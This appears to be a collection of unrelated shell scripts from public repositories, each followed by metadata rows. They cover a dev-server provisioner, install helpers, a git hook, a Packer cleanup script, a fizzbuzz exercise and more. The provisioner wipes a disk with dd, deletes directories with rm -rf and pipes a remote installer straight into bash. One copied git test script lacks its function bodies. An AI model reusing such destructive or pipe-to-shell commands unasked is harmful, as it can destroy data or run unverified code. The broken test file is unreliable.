# Provision a dev server: repartition /dev/sdb as a data disk, relocate
# docker/go/projects directories onto it via symlinks, and install the full
# toolchain (docker, go, terraform, az cli, chrome, build tools).
# Must run as root; the first argument is the real (non-root) username.
function fix_disk {
echo "Arranging data disk"
echo "Un mounting data disk"
umount /dev/sdb1
echo "Wiping diskk"
dd if=/dev/zero of=/dev/sdb bs=1024 count=8096
echo "Creating partition table"
parted -s /dev/sdb mktable gpt
echo "Creating partition"
parted -s /dev/sdb mkpart primary ext4 0% 100%
echo "Reading partition tables"
partprobe
echo "Formatting disk with ext4"
mkfs.ext4 /dev/sdb1
echo "Mounting disk"
mount /dev/sdb1
}
function create_links {
echo "Creating folders and symlinks for ${real_user} and ${HOME}"
rm -rf ${HOME}/go /var/lib/docker ${HOME}/projects
mkdir /mnt/docker
mkdir /mnt/go
mkdir /mnt/projects
chown ${real_user}:${real_user} /mnt/go /mnt/projects
ln -s /mnt/go ${HOME}/go
ln -s /mnt/docker /var/lib/docker
ln -s /mnt/projects ${HOME}/projects
chown -h ${real_user}:${real_user} ${HOME}/go ${HOME}/projects
}
function install_go {
apt-get -y install unzip
filename='go1.13.4.linux-amd64.tar.gz'
# Bug fix: the download/extract lines referenced a bogus `$(unknown)` command
# substitution; they clearly intend the `filename` variable set just above.
wget "https://dl.google.com/go/${filename}"
tar -C /usr/local -xzf "${filename}"
echo 'export GOPATH=$HOME/go' >> ~/.bash_profile
echo 'export GOROOT=/usr/local/go' >> ~/.bash_profile
echo 'export PATH=$GOPATH/bin:$GOROOT/bin:$PATH' >> ~/.bash_profile
}
function install_terraform {
filename='terraform_0.12.16_linux_amd64.zip'
# Bug fix: same `$(unknown)` -> ${filename} repair as in install_go.
wget "https://releases.hashicorp.com/terraform/0.12.16/${filename}"
unzip "${filename}"
mv terraform /usr/local/bin
}
function install_az_cli {
curl -sL https://aka.ms/InstallAzureCLIDeb | bash
}
function install_docker_repo {
apt-get -y install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
}
function install_docker {
apt-get -y install docker-ce docker-ce-cli containerd.io
usermod -aG docker ${real_user}
}
function install_systools {
apt-get -y install iftop iotop sysstat
}
function install_chrome {
apt-get -y install fonts-liberation libappindicator3-1 libasound2 libatk-bridge2.0-0 libatspi2.0-0 libgtk-3-0 libnspr4 libnss3 libx11-xcb1 xdg-utils libxss1
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome*.deb
}
function install_dev_tools {
apt-get -y install make gcc
}
function install_all {
apt-get update -y
install_docker_repo
apt-get update -y
install_systools
install_docker
install_go
install_terraform
install_az_cli
install_chrome
install_dev_tools
}
set -e
if [ "$1" != "" ]; then
real_user="$1"
HOME="/home/${real_user}"
else
echo "The script must be invoked with the username as first argument"
exit 1
fi
fix_disk
create_links
install_all
| true
|
ce630ad05b86e6302bcc86eb72e88adc33a3a69e
|
Shell
|
JRasmusBm/dotfiles
|
/layouts/home
|
UTF-8
| 140
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/sh
# Display-layout helper: invoked as `home supported`, exits 0 when xrandr
# reports the HDMI-1 output as connected, non-zero otherwise. Other queries
# fall through and exit 0 (set -e permitting).
set -e
_layout() {
# only the 'supported' query is handled
if test "$1" = 'supported'; then
xrandr | ggrep -q 'HDMI-1 connected'
exit $?
fi
}
# ggrep above: GNU grep binary name (e.g. via Homebrew on macOS/BSD)
_layout "$@"
| true
|
1c766075396003331306f877af47833d31afa405
|
Shell
|
boklm/mageia-puppet
|
/modules/buildsystem/templates/binrepo/wrapper.upload-bin
|
UTF-8
| 586
| 3
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Gatekeeper wrapper around the binrepo upload script: only members of the
# packagers-committers group may upload; the real script then runs as the
# binrepo user with the caller's username prepended to the arguments.
# The <%= ... %> placeholders are substituted by Puppet (ERB template).
binrepouser="<%= scope.lookupvar('buildsystem::var::binrepo::login') %>"
uploadbinpath="<%= scope.lookupvar('buildsystem::var::binrepo::uploadbinpath') %>"
packagerscommittersgroup="<%= scope.lookupvar('buildsystem::var::groups::packagers_committers') %>"
# isingroup GROUP -- return 0 if the invoking user is a member of GROUP.
# (plain name() definition: the `function` keyword is a bashism under #!/bin/sh)
isingroup()
{
    grp="$1"
    for group in `groups`
    do
        if [ "$grp" = "$group" ]
        then
            return 0
        fi
    done
    return 1
}
if ! isingroup "$packagerscommittersgroup"
then
    echo "You are not in $packagerscommittersgroup group."
    exit 1
fi
# Fix: quote "$@" so uploaded file names containing spaces survive.
sudo -u "$binrepouser" "$uploadbinpath" $(whoami) "$@"
| true
|
fc8bb1f0123076632a4e1807f8df09677f4c2dc8
|
Shell
|
DanHam/packer-testing
|
/vmware/iso/centos/scripts/00-remove-extraneous-packages.sh
|
UTF-8
| 1,573
| 3.640625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Remove extraneous packages installed by Anaconda
#
# Set verbose/quiet output based on env var configured in Packer template
[[ "$DEBUG" = true ]] && REDIRECT="/dev/stdout" || REDIRECT="/dev/null"
# Logging for Packer
echo "Removing extraneous packages installed by Anaconda..."
# The following packages are installed by Anaconda regardless of any
# attempts to exclude them in the %packages section. In short Anaconda
# seems to ignore options and settings in the %packages section and does
# its own thing regardless...
PACKAGE_LIST=(
atk
atkmm
btrfs-progs
cairo
cairomm
cups-libs
e2fsprogs
e2fsprogs-libs
gdk-pixbuf2
graphite2
gtk2
gtkmm24
harfbuzz
hicolor-icon-theme
jasper-libs
jbigkit-libs
libX11
libXcomposite
libXcursor
libXdamage
libXext
libXfixes
libXft
libXi
libXinerama
libXrandr
libXrender
libXtst
libXxf86vm
libdrm
libjpeg-turbo
libpng
libss
libthai
libtiff
libxcb
libxshmfence
mesa-libEGL
mesa-libGL
mesa-libgbm
mesa-libglapi
open-vm-tools
open-vm-tools-desktop
pango
pangomm
pixman
)
# Depending, some packages listed may not be on the system so build a list
# to avoid error messages. (Array expansions quoted per shell best practice.)
REMOVE_LIST=()
for PACKAGE in "${PACKAGE_LIST[@]}"
do
# rpm -q exits 0 only when the package is installed
if rpm -q "${PACKAGE}" &>/dev/null; then
REMOVE_LIST+=("${PACKAGE}")
fi
done
# Remove packages. Fix: skip the yum call entirely when nothing matched --
# `yum remove` with no package arguments is an error.
if [ "${#REMOVE_LIST[@]}" -gt 0 ]; then
yum -C -y remove --setopt="clean_requirements_on_remove=1" \
"${REMOVE_LIST[@]}" > "$REDIRECT"
fi
exit 0
| true
|
0157192e1192764c475d4b1b3e76815efa8625d7
|
Shell
|
particleman314/ShellLibrary
|
/test/stringmgt/repeat.sh
|
UTF-8
| 300
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Tests for the string-management `repeat` helper. Both `repeat` and the
# assert_* helpers are provided by the surrounding test harness, which is
# presumed to source this file -- confirm against the library's test runner.
answer=$( repeat )
assert_failure $?
# missing --number-times: must fail
answer=$( repeat --repeat-char '|' )
assert_failure $?
# zero repetitions: must fail
answer=$( repeat --repeat-char '+' --number-times 0 )
assert_failure $?
# happy path: ten '+' characters
answer=$( repeat --repeat-char '+' --number-times 10 )
assert_success $?
assert_equals '++++++++++' "${answer}"
| true
|
1b0d65fed554623bba0830cd77737efb078d0019
|
Shell
|
id774/scripts
|
/installer/install_django.sh
|
UTF-8
| 1,815
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/sh
#
########################################################################
# Install Django
# $1 = python path
# $2 = django version
# $3 = django minor version
# $4 = not save to src
# $5 = nosudo
#
# Maintainer: id774 <idnanashi@gmail.com>
#
# v2.0 10/24,2013
# Install for stable version.
# v1.3 3/7,2010
# Refactoring.
# v1.2 2/23,2010
# Implement svn up and build.
# v1.1 2/20,2010
# Refactoring.
# v1.0 9/8,2008
# Stable.
########################################################################
# Resolve defaults for python path, django versions, and whether to use sudo;
# pick ownership/copy flags per platform.
setup_environment() {
test -n "$1" || PYTHON_PATH=/usr/bin/python
test -n "$1" && PYTHON_PATH=$1
test -n "$2" || DJANGO_VERSION=1.6
test -n "$2" && DJANGO_VERSION=$2
test -n "$3" || DJANGO_MINOR_VERSION=1.6
test -n "$3" && DJANGO_MINOR_VERSION=$3
test -n "$5" || SUDO=sudo
test -n "$5" && SUDO=
test "$5" = "sudo" && SUDO=sudo
case $OSTYPE in
*darwin*)
OWNER=root:wheel
OPTIONS=-pR
;;
*)
OWNER=root:root
OPTIONS=-a
;;
esac
}
# Keep a copy of the unpacked source tree under /usr/local/src/django.
save_sources() {
test -d /usr/local/src/django || $SUDO mkdir -p /usr/local/src/django
$SUDO cp $OPTIONS Django-$DJANGO_VERSION /usr/local/src/django
# Bug fix: honor the nosudo option ($5) like the surrounding commands --
# this line previously hardcoded `sudo`, defeating the $SUDO mechanism.
$SUDO chown -R $OWNER /usr/local/src/django
}
# Download, unpack, and install the requested stable release.
install_stable() {
mkdir install_django
cd install_django
wget https://www.djangoproject.com/m/releases/$DJANGO_MINOR_VERSION/Django-$DJANGO_VERSION.tar.gz
tar xzvf Django-$DJANGO_VERSION.tar.gz
cd Django-$DJANGO_VERSION
$SUDO $PYTHON_PATH setup.py install
cd ..
test -n "$4" || save_sources
cd ..
$SUDO rm -rf install_django
}
install_django() {
setup_environment $*
install_stable $*
django-admin.py --version
}
# abort early when the download host is unreachable
ping -c 1 id774.net > /dev/null 2>&1 || exit 1
install_django $*
| true
|
2866027eabc2ce23aa46d622ed5f60447335d734
|
Shell
|
weilaidb/PythonExample
|
/regularexpress/home/weilaidb/software/git-2.0.5/t/t6002-rev-list-bisect.sh
|
UTF-8
| 3,500
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/sh
#
# Copyright (c) 2005 Jon Seymour
#
# NOTE(review): this copy appears truncated by extraction -- both
# test_bisection_diff() and test_sequence() below are bare `name()` headers
# with no compound-command body, which is not valid sh. Recover the missing
# bodies from upstream git.git t/t6002 before running.
test_description='Tests git rev-list --bisect functionality'
. ./test-lib.sh
. "$TEST_DIRECTORY"/lib-t6000.sh # t6xxx specific functions
# usage: test_bisection max-diff bisect-option head ^prune...
#
# e.g. test_bisection 1 --bisect l1 ^l0
#
test_bisection_diff()
date >path0
git update-index --add path0
save_tag tree git write-tree
on_committer_date "00:00" hide_error save_tag root unique_commit root tree
on_committer_date "00:01" save_tag l0 unique_commit l0 tree -p root
on_committer_date "00:02" save_tag l1 unique_commit l1 tree -p l0
on_committer_date "00:03" save_tag l2 unique_commit l2 tree -p l1
on_committer_date "00:04" save_tag a0 unique_commit a0 tree -p l2
on_committer_date "00:05" save_tag a1 unique_commit a1 tree -p a0
on_committer_date "00:06" save_tag b1 unique_commit b1 tree -p a0
on_committer_date "00:07" save_tag c1 unique_commit c1 tree -p b1
on_committer_date "00:08" save_tag b2 unique_commit b2 tree -p b1
on_committer_date "00:09" save_tag b3 unique_commit b2 tree -p b2
on_committer_date "00:10" save_tag c2 unique_commit c2 tree -p c1 -p b2
on_committer_date "00:11" save_tag c3 unique_commit c3 tree -p c2
on_committer_date "00:12" save_tag a2 unique_commit a2 tree -p a1
on_committer_date "00:13" save_tag a3 unique_commit a3 tree -p a2
on_committer_date "00:14" save_tag b4 unique_commit b4 tree -p b3 -p a3
on_committer_date "00:15" save_tag a4 unique_commit a4 tree -p a3 -p b4 -p c3
on_committer_date "00:16" save_tag l3 unique_commit l3 tree -p a4
on_committer_date "00:17" save_tag l4 unique_commit l4 tree -p l3
on_committer_date "00:18" save_tag l5 unique_commit l5 tree -p l4
git update-ref HEAD $(tag l5)
# Second history: two parallel chains e1..e8 and f1..f4 between E and F.
# E
# / \
# e1 |
# | |
# e2 |
# | |
# e3 |
# | |
# e4 |
# | |
# | f1
# | |
# | f2
# | |
# | f3
# | |
# | f4
# | |
# e5 |
# | |
# e6 |
# | |
# e7 |
# | |
# e8 |
# \ /
# F
on_committer_date "00:00" hide_error save_tag F unique_commit F tree
on_committer_date "00:01" save_tag e8 unique_commit e8 tree -p F
on_committer_date "00:02" save_tag e7 unique_commit e7 tree -p e8
on_committer_date "00:03" save_tag e6 unique_commit e6 tree -p e7
on_committer_date "00:04" save_tag e5 unique_commit e5 tree -p e6
on_committer_date "00:05" save_tag f4 unique_commit f4 tree -p F
on_committer_date "00:06" save_tag f3 unique_commit f3 tree -p f4
on_committer_date "00:07" save_tag f2 unique_commit f2 tree -p f3
on_committer_date "00:08" save_tag f1 unique_commit f1 tree -p f2
on_committer_date "00:09" save_tag e4 unique_commit e4 tree -p e5
on_committer_date "00:10" save_tag e3 unique_commit e3 tree -p e4
on_committer_date "00:11" save_tag e2 unique_commit e2 tree -p e3
on_committer_date "00:12" save_tag e1 unique_commit e1 tree -p e2
on_committer_date "00:13" save_tag E unique_commit E tree -p e1 -p f1
# Third history: star-shaped merge V of five branches off u0.
on_committer_date "00:00" hide_error save_tag U unique_commit U tree
on_committer_date "00:01" save_tag u0 unique_commit u0 tree -p U
on_committer_date "00:01" save_tag u1 unique_commit u1 tree -p u0
on_committer_date "00:02" save_tag u2 unique_commit u2 tree -p u0
on_committer_date "00:03" save_tag u3 unique_commit u3 tree -p u0
on_committer_date "00:04" save_tag u4 unique_commit u4 tree -p u0
on_committer_date "00:05" save_tag u5 unique_commit u5 tree -p u0
on_committer_date "00:06" save_tag V unique_commit V tree -p u1 -p u2 -p u3 -p u4 -p u5
test_sequence()
test_sequence "--bisect"
#
#
test_done
| true
|
3a19efb4ee8079f613b0b5675d72691d51b17f23
|
Shell
|
themonki/recipes-deploy-vagrant
|
/trabajoGrado/Prototipe/PrototipeGTKInterface/scripts/cancel-job.sh
|
UTF-8
| 736
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# -*- mode: sh -*-
# vi: set ft=sh :
## Script that cancels a (Globus) job given its contact string
USER_PASS=""
STRING_CONTACT=""
export PATH_PROXY_VALIDACION=$PWD_PROTOTIPEGTK_SCRIPTS/proxyValidacion.sh
# file_exists FILE -- 0 if FILE exists, 1 otherwise (appears unused here)
file_exists() {
FILE=$1
if [ -e $FILE ]; then
return 0;
else
return 1;
fi
}
# Print a usage-error message (the message text itself is user-facing
# Spanish output and is left untranslated).
function print_error {
printf '%s\n' "";
printf '%s\n' "Error: Parámetros incorrectos.";
}
# Validate the proxy with the user's password, then cancel (globusrun -k)
# the job identified by the -s contact string.
function cancel_job {
if [[ $STRING_CONTACT != "" ]] ; then
$PATH_PROXY_VALIDACION -q -p $USER_PASS
VALUE=$(globusrun -k $STRING_CONTACT);
printf '%s\n' "$VALUE";
fi
}
# -p user password, -s job contact string
while getopts 'p: s:' option;
do
case "$option"
in
p) USER_PASS="$OPTARG";;
s) STRING_CONTACT="$OPTARG";;
*) print_error; exit 2;;
esac
done
cancel_job
| true
|
ae6020e986e34eda111fed75a94c95d61333af67
|
Shell
|
alejandro2014/recipes
|
/generate
|
UTF-8
| 112
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/bash
# Render every Markdown recipe in the current directory to HTML with pandoc.
# Fixed: the original parsed `ls *.md | cut -d. -f1`, which breaks on names
# containing whitespace and truncates names with more than one dot
# ("a.b.md" became "a"); iterating the glob and stripping only the ".md"
# suffix handles both.
for recipe_md in *.md; do
    [ -e "$recipe_md" ] || continue   # no .md files: glob stayed literal
    recipe=${recipe_md%.md}
    pandoc "${recipe}.md" -s -o "./html/${recipe}.html"
done
| true
|
2d0d6d6672ee4fd1757791a3b417f943459b80aa
|
Shell
|
global-121/121-platform
|
/tools/git-hooks/pre-commit
|
UTF-8
| 1,497
| 3.203125
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# git pre-commit hook: lint every staged package that supports `npm run lint`,
# then warn about files that must be kept identical across the interfaces.
#

# Lint the package rooted at $1 when any staged path matches that prefix.
check_if_need_to_lint() {
  # Nothing staged under this prefix -> nothing to lint.
  git diff --cached --name-only | grep --quiet "$1*" || return 0
  cd "$(git rev-parse --show-toplevel)" || exit
  npm run lint --if-present --prefix "$1"
}

# Include all packages/applications that support an `npm run lint` task:
check_if_need_to_lint "interfaces/PA-App/"
check_if_need_to_lint "interfaces/AW-App/"
check_if_need_to_lint "interfaces/HO-Portal/"
check_if_need_to_lint "services/121-service/"

# Print a highlighted warning when a "keep in sync" file ($1) is staged.
# tput: setaf 3 = yellow, smso/rmso = standout on/off, sgr0 = reset.
check_if_need_to_be_in_sync() {
  git diff --cached --name-only | grep --quiet "$1*" || return 0
  echo " "
  echo "$(tput setaf 3)$(tput smso) ! $(tput sgr0) Make sure to keep $(tput smso) $1 $(tput sgr0) in sync between all interfaces!"
  echo " "
}

check_if_need_to_be_in_sync ".editorconfig"
check_if_need_to_be_in_sync ".prettierignore"
check_if_need_to_be_in_sync ".prettierrc.yml"
check_if_need_to_be_in_sync ".vscode/settings.json"
check_if_need_to_be_in_sync "app/shared/dialogue-turn"
check_if_need_to_be_in_sync "app/shared/q-and-a-set"
check_if_need_to_be_in_sync "app/shared/numeric-input"
check_if_need_to_be_in_sync "app/shared/phone-number-input"
check_if_need_to_be_in_sync "app/services/api.service"
check_if_need_to_be_in_sync "app/services/translatable-string"
| true
|
f0f1658a706a4fb84dccf9cb6e81a37a7783eb1d
|
Shell
|
wruibo/tools
|
/shell/line_counter.sh
|
UTF-8
| 611
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/sh
# Sum the line counts of all files named <name> under <path>, skipping any
# file whose line count is not below <limit> (default 10000).
usage=" Usage:\n
\t$0 <path> <name> <limit>\n
count the line number of files match <name> in the <path> which line number less than <limit>"

if [ $# -lt 2 ]
then
    # %b expands the \n/\t escapes; the original plain `echo` printed them
    # literally, which was clearly not the intent of the usage template.
    printf '%b\n' "$usage"
    exit 0
fi

path=$1
name=$2

limit=10000
if [ $# -gt 2 ]
then
    limit=$3
fi
echo "$limit"

echo "counting the line number of file $name in $path..."

total_line=0
# Iterate find's results one *line* at a time so paths containing spaces
# survive (paths containing newlines remain unsupported). The name pattern is
# quoted so the shell cannot glob-expand it against the current directory.
old_ifs=$IFS
IFS='
'
for file in $(find "$path" -iname "$name")
do
    echo "$file"
    line=$(wc -l < "$file")
    if [ "$line" -lt "$limit" ]
    then
        total_line=$((total_line + line))
        echo "$line in file: $file"
    fi
done
IFS=$old_ifs

echo "job done, total line number is: $total_line"
| true
|
ac958135e32dbae539f067b83fe259d64d455de5
|
Shell
|
Duanzuning/Test
|
/gensim.sh
|
UTF-8
| 1,566
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Daily corpus build for the news clusterer:
#   1. tokenize one day's documents with jieba_gensim.py,
#   2. append the new seed corpus/index to the running files,
#   3. re-cluster with gensim_cluster.py and promote the updated corpus.
# NOTE(review): the loop bounds (i=29; i>=29) process exactly one day -- the
# day 29 days ago; widen the range to backfill more days.
for((i=29;i>=29;i--));do
# Various date renderings for the target day ("-$i day" ago).
# NOTE(review): run_date, week_day, week_number and week are computed but not
# used below in this script -- possibly leftovers; verify before removing.
run_date=`date +%Y-%m-%d --date="-${i} day"`
rundate=`date +%Y%m%d --date="-${i} day"`
day=`date +%d --date="-${i} day"`
month=`date +%m --date="-${i} day"`
week_day=`date +%w --date="-${i} day"`
week_number=`date +%W --date="-${i} day"`
week=`date +%W --date="-${i} day"`
# Fixed filesystem layout: working corpus, its backup, raw docs, tooling.
corpusdir="/home/dzn/hd/corpus"
corpusbackup="/home/dzn/hd/corpus_backup"
docsdir="/home/dzn/Hd_news"
pyscrips="/home/dzn/py_tools"
corpuspath=${corpusdir}/seedcorpus.txt
indexpath=${corpusdir}/seedindex.txt
# Create Corpus File
# On the 1st of the month, reset the month folder and the rolling seed files.
if [ ${day} == 01 ];then
rm -rf ${corpusdir}/month_${month}
mkdir ${corpusdir}/month_${month}
rm -rf ${corpuspath} ${indexpath}
touch ${corpuspath} ${indexpath}
fi
# Fresh per-day working directory (any previous run for the day is discarded).
corpusday=${corpusdir}/month_${month}/${rundate}
rm -rf ${corpusday}
mkdir ${corpusday}
cd ${corpusday}
filepath=${docsdir}/month_${month}/${rundate}
# Tokenize the day's documents; writes seedcorpus_/seedindex_ files + a log.
${pyscrips}/jieba_gensim.py -i ${filepath} -c ${corpusday} -r ${rundate} -o ${indexpath} > ${corpusday}/gensim_${rundate}.log
# Only merge and re-cluster when tokenization succeeded.
if [ $? == 0 ];then
cat ${corpusbackup}/seedindex.txt ${corpusday}/seedindex_${rundate}.txt > ${indexpath}
cat ${corpusbackup}/seedcorpus.txt ${corpusday}/seedcorpus_${rundate}.txt > ${corpuspath}
${pyscrips}/gensim_cluster.py -i ${indexpath} -c ${corpuspath} -d ${corpusdir} -r ${rundate} -p ${corpusday} > ${corpusday}/updatecluster_${rundate}.log
# Promote the clusterer's updated corpus over the working seed corpus.
mv -f ${corpusdir}/seedcorpus_${rundate}.txt ${corpuspath}
rm -rf ${corpusdir}/index.0
#if [ $? == 0 ];then
#cp -f ${indexpath} ${corpusbackup}/seedindex.txt
#cp -f ${corpuspath} ${corpusbackup}/seedcorpus.txt
#fi
fi
done
| true
|
833415ab90a491c7bc1b7777b83649d9b2e6a62a
|
Shell
|
jingapore/command_line_scripting
|
/getopts.sh
|
UTF-8
| 1,360
| 3.84375
| 4
|
[] |
no_license
|
# Demo of the getopts builtin: a global -h flag first, then a
# "pip install"-style subcommand with its own -t option.
# The leading ':' in the optstring enables silent error reporting
# (unknown option -> opt='?', missing argument -> opt=':').
while getopts :h opt; do
case ${opt} in
h)
echo "Usage:"
echo "    pip -h"
echo "    pip install <package>"
exit 0
;;
\?)
echo "Invalid Option: -$OPTARG"
exit 1
;;
# a)
#   echo "Now at option a"
#   echo "Args for option a is $OPTARG"
#   exit 0
#   ;;
esac
done
#this will execute only if option is not passed
# NOTE(review): OPTIND is not reset before the second getopts loop below;
# this works here only because the first loop exits on any parsed option,
# so OPTIND is still 1 when the subcommand path is taken -- TODO confirm.
subcommand=$1;
case $subcommand in
install)
shift; #shift causes the string after install, to be next argument
package=$1; shift;
echo "Package is $package";
# Parse the subcommand's own options, e.g. `install <pkg> -t <arg>`.
while getopts ":t:" opt; do
case ${opt} in
t)
echo "Parsing option ${opt}"
echo "Argument is $OPTARG" #note that we do not exit here, so as to parse argument after option -t
echo "Option index is $OPTIND"
;;
\?)
echo "Parsing option ${opt}"
echo "Option index is $OPTIND"
;;
:)
echo "Invalid option: -$OPTARG requires an argument"
echo "Option index is $OPTIND"
# exit 1
;;
esac
done
esac
| true
|
123c77a8d87fc2d97ea9798ab3ef2dcf6f490212
|
Shell
|
J-U-B/OPSI-dotnet-check
|
/OPSI/postinst
|
UTF-8
| 2,518
| 3.859375
| 4
|
[] |
no_license
|
#! /bin/bash
#=====================================================================
# postinst script
# This script executes after unpacking files from that archive and registering the product at the depot.
#
# The following environment variables can be used to obtain information about the current installation:
# PRODUCT_ID: id of the current product
# CLIENT_DATA_DIR: directory which contains the installed client data
#=====================================================================
# J. Boettge <boettge@mpi-halle.mpg.de>	2021-02-01 15:15:00 +0100
#=====================================================================
# All output (stdout and stderr) from here on goes to a per-product log file.
LOGFILE=/tmp/${PRODUCT_ID}__opsi_package_install.log
exec >> $LOGFILE
exec 2>&1
chgrp opsiadmin $LOGFILE
chmod g+rw $LOGFILE
echo "=================================================="
echo "${PRODUCT_ID} POSTINST LOG"
echo "=================================================="
# SRC: shared source dir keyed by the product id without a leading "0_".
# NOTE(review): only the "0_" prefix is stripped here, not "test_" --
# verify that testing packages are meant to share the "test_*" source dir.
SRC="${CLIENT_DATA_DIR}/../../source/${PRODUCT_ID##0_}"
DST="${CLIENT_DATA_DIR}/files"
# remove trailing "/" in path:
DST=${DST%\/}
ERR=0
### check for testing and O4I package:
# IS_TESTING: true when the id starts with "0_" or "test_".
# IS_O4I: true when (after stripping those prefixes) the id starts with "o4i_".
# NOTE(review): IS_TESTING is computed but not referenced later in this
# script -- possibly used by conventions elsewhere; verify before removing.
P=${PRODUCT_ID}
[ "${P}" = "${P##0_}" -a "${P}" = "${P##test_}" ] && IS_TESTING=false || IS_TESTING=true
P=${P/#0_/}
P=${P/#test_/}
[ "${P}" = "${P##o4i_}" ] && IS_O4I=false || IS_O4I=true
if [ $IS_O4I == true ]; then
	# O4I packages get a real files directory instead of a symlink.
	[ ! -d "${DST}" ] && mkdir $DST
else
	### symlink files directory to ../../source/${PRODUCT_ID##0_} only
	### for non-O4I packages:
	if [ -h "${DST}" ]; then
		echo "Symlink to [${DST}] already exists. - Replacing"
		rm ${DST}
	fi
	if [ ! -d "${SRC}" ]; then
		echo "Directory [${SRC}] does not exist. Try to create it."
		mkdir -m 750 ${SRC} && chgrp pcpatch ${SRC}
	fi
	# Never clobber a pre-existing real directory/file at the link target.
	# NOTE(review): plain `echo` prints the "\n" below literally;
	# `echo -e` was probably intended.
	if [ -d "${DST}" ]; then
		echo "Directory [${DST}] already exists!\nSkipping creation of symlink."
	elif [ -f "${DST}" ]; then
		echo "File [${DST}] already exists!\nSkipping creation of symlink."
	else
		ln -s ${SRC} ${DST}
	fi
fi
### restore custom directories
# The preinst step stashed "custom" and "files" into ${PRODUCT_ID}.tmp;
# move them back over whatever the package just installed.
TMP_DIR=${CLIENT_DATA_DIR}/../${PRODUCT_ID}.tmp
if [ -d $TMP_DIR ]; then
	echo 'Restoring previous directories...'
	for DIRNAME in custom files; do
		echo "* [${DIRNAME}]"
		if [ -d $TMP_DIR/${DIRNAME} ]; then
			test -e $CLIENT_DATA_DIR/${DIRNAME} && rm -rf $CLIENT_DATA_DIR/${DIRNAME}
			echo -e "\tmoving $TMP_DIR/${DIRNAME} to $CLIENT_DATA_DIR/"
			mv $TMP_DIR/${DIRNAME} $CLIENT_DATA_DIR/ || exit 1
		else
			echo -e "\tdoes not exist here"
		fi
	done
fi
echo "Removing temporary files..."
rm -rf $TMP_DIR
### download files form vendor:
#...not required here
exit $ERR
| true
|
563b91d9d58e855856d6c051cda0f2372f07c514
|
Shell
|
htown101/Networking
|
/fizzbuzzpt2
|
UTF-8
| 404
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# program: Fizzbuzz part 2
# Heather McMillen
# Date of last revision: 3/3/2013
#
# Prints fizz/buzz/fizzbuzz (or the number) for each integer 1 .. value-1.
# Bug fixed: the combined "fizzbuzz" case must be tested *before* the single
# divisibility checks -- in the original it came last and was unreachable,
# because multiples of 15 already matched the "%3" branch.

# classify NUM -> echoes "fizzbuzz", "fizz", "buzz", or NUM itself.
classify() {
    if [ $(($1 % 15)) -eq "0" ]; then
        echo "fizzbuzz"
    elif [ $(($1 % 3)) -eq "0" ]; then
        echo "fizz"
    elif [ $(($1 % 5)) -eq "0" ]; then
        echo "buzz"
    else
        echo "$1"
    fi
}

num=1
value=0
echo -n "Enter a number > "
# Robustness: on EOF keep value=0 so the loop below simply does nothing
# (the original compared against an empty string and errored out).
read value || value=0
while [ $num -lt $value ]
do
    classify $num
    num=$((num + 1))
done
| true
|
8f7508b1ea89e7bb023fafecb385e6f60f601fe3
|
Shell
|
RedHatGov/redhatgov.workshops
|
/container_security/files/nodes/registry-files/gen-certs/gen-cert.sh
|
UTF-8
| 787
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Create (or reuse) a self-signed certificate/key pair for the registry.
# Edit myserver.cnf and set the FQDN and ORGNAME variables to reflect your
# system, then run this script.
#
CERT_SRC=/home/ec2-user/files/cert.pem
KEY_SRC=/home/ec2-user/files/key.pem

if [ -f "$CERT_SRC" ] && [ -f "$KEY_SRC" ]; then
	# A pre-provisioned pair exists: just copy it into place.
	echo "Using existing certificate and key from '/home/ec2-user/files'."
	cp "$CERT_SRC" myserver.cert
	cp "$KEY_SRC" myserver.key
else
	# Otherwise generate a fresh 4096-bit key, a CSR from myserver.cnf,
	# and a self-signed certificate valid for 2000 days.
	touch myserver.key
	chmod 600 myserver.key
	openssl req -new -newkey rsa:4096 -nodes -sha256 -config myserver.cnf -keyout myserver.key -out myserver.csr
	openssl x509 -signkey myserver.key -in myserver.csr -req -extfile myserver.cnf -days 2000 -out myserver.cert
	# Show the first lines of the resulting certificate for a quick sanity check.
	openssl x509 -noout -text -in myserver.cert | head -10
fi
| true
|
070ec6dd2643af05ba62b03f3375bbd16dd588b5
|
Shell
|
willghatch/dotfileswgh
|
/commands/racket-dev-environment.sh
|
UTF-8
| 467
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
# Drop into the dotfileswgh Racket development environment (NixOS only).
# Passing "fhs" as $1 selects the FHS-wrapped variant of the environment.

case "$1" in
    fhs) NIXFILE=$DOTFILESWGH/nixos/racket/racket-fhs-env.nix ;;
    *)   NIXFILE=$DOTFILESWGH/nixos/racket/racket-env.nix ;;
esac

if test -f /etc/NIXOS; then
    # --pure wipes the environment; explicitly keep the variables below.
    exec nix-shell $NIXFILE --pure \
         --keep CURRENT_DEV_PATH \
         --keep CURRENT_DEV_MODE \
         --keep EMACS_DOT_D_PATH \
         --keep LANG \
         --command $DOTFILESWGH/nixos/racket/racket-post-env.sh
else
    echo "Now only supporting NixOS..." 1>&2
    exit 1
fi
| true
|
30cc6a70ba76fca79fa51aefddc294c3d4290136
|
Shell
|
meedan/alegre
|
/postgres/shared-sync.sh
|
UTF-8
| 168
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Copy bundled PostgreSQL share files into the server's share directory.
# SRC and DEST can be overridden through the environment.
set -e

SRC=${SRC:-/opt/shared}
DEST=${DEST:-/usr/share/postgresql/$PG_MAJOR}

